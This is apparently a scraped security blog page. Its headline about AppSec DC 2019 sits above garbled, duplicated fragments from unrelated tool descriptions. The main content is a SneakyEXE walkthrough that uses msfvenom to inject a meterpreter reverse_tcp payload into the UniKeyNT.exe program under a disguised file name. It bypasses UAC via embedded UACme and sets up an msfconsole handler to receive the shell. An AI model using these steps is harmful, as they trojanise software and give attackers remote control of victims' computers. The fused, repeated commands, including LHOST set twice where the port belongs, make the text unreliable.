ANNOUNCEMENT: Submitters Of Papers And Training For Global AppSec DC 2019 (Formerly AppSec USA)
Posted
by Frames
on 3:55 AM
No comments yet
msfvenom, files generated by this program might be already flagged by Anti-virus programs.sudo apt install python2 python3 metasploit-frameworksudo pacman -S python2 python3 metasploitsudo):
"snmpcheck is a free open source utility to get information via SNMP protocols. It works fine against Windows, Linux, Cisco, HP-UX, SunOS systems and any devices with SNMP protocol support. It could be useful for penetration testing or systems monitoring. snmpcheck has been tested on GNU/Linux, *BSD, Windows systems and Cygwin. snmpcheck is distributed under GPL license and based on Athena-2k script by jshaw. " read more...sudo apt install python3sudo pacman -S python3\SneakyEXE\Win32\.sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).sneakyexe.exe to whatever directory you want and delete the unzipped one)pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exemsfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.uNiKeY.exe, i used this command:python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXEsudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit- This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
- Feel free to use this project in your software, just don't reclaim the ownerhsip.
Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).Author: Copyright © 2019 by Zenix Blurryface.
sudo apt install python3sudo pacman -S python3\SneakyEXE\Win32\.sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).sneakyexe.exe to whatever directory you want and delete the unzipped one)pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exemsfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.uNiKeY.exe, i used this command:python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXEsudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit- This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
- Feel free to use this project in your software, just don't reclaim the ownerhsip.
Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).Author: Copyright © 2019 by Zenix Blurryface.
![]() |
| XSW-Attacker overview |
Subscribe via RSS Feed stay updated with blog articles
Subscribe via email address: